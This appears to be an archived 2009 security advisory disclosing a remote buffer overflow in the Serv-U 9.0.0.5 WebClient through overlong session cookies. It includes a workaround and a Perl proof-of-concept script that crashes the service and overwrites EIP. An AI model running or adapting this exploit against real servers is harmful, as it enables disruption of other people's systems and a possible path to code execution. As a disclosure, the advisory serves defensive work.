what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Serv-U 9.0.0.5 WebClient Buffer Overflow

Serv-U 9.0.0.5 WebClient Buffer Overflow
Posted Nov 3, 2009
Authored by Nikolaos Rangos

Rhinosoft.com Serv-U web client version 9.0.0.5 suffers from a remote buffer overflow vulnerability. Proof of concept code included.

tags | exploit, remote, web, overflow, proof of concept
SHA-256 | c8498ca90838fe61c74043cbaf8479e8f9e2c3db44ef86f7f5686195db8f4055

Serv-U 9.0.0.5 WebClient Buffer Overflow

Change Mirror Download
-- KC Security PUBLIC ADVISORY -- http://www.rangos.de -- 
11-01-2009


RhinoSoft.com Serv-U 9.0.0.5 WebClient Remote Buffer Overflow


Background
------------

Serv-U includes a simple, browser-based transfer client perfect
for every business environment. The Web Client is accessed through
a standard web browser and features an unintimidating, familiar interface.
It is a great way for sharing photos and image files with clients and
co-workers due to its configurable thumbnail view that allows remote
images to be quickly viewed without downloading the entire file.
An additional slideshow view offers a fast way to share a collection
of photos from your latest projects. When using Serv-U, photo sharing
sites and large email attachments are a thing of the past!


Description
------------

Remote exploitation of a buffer overflow in the Serv-U WebClient
may allow attackers to execute arbitrary code.

The problem lies in the handling of overly long Session Cookies.
When a very long session cookie is sent to the Serv-U WebClient
HTTP Service an overrun occurs and EIP becomes "overwritten".


Detection
------------
KC Security confirmed the vulnerability in the latest version of Serv-U
WebClient which is 9.0.0.5.


Workaround
------------
Disable the WebClient Service and use the Serv-U FTP/SFTP components only.


Proof of concept
------------
The following PERL script will crash the Serv-U.exe service and overwrite
EIP with 0xAAAAAAAA.

---snip---
use IO::Socket;

$|=1;
$a = "A" x 100000;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');

print $sock "POST / HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$a\r\n"
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"
."Content-Length: 0\r\n\r\n";

while (<$sock>) {
print;
}
---snip---


Credit
------------
This vulnerability was discovered by Nikolaos Rangos of KC Security.
Visit us at http://www.rangos.de

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close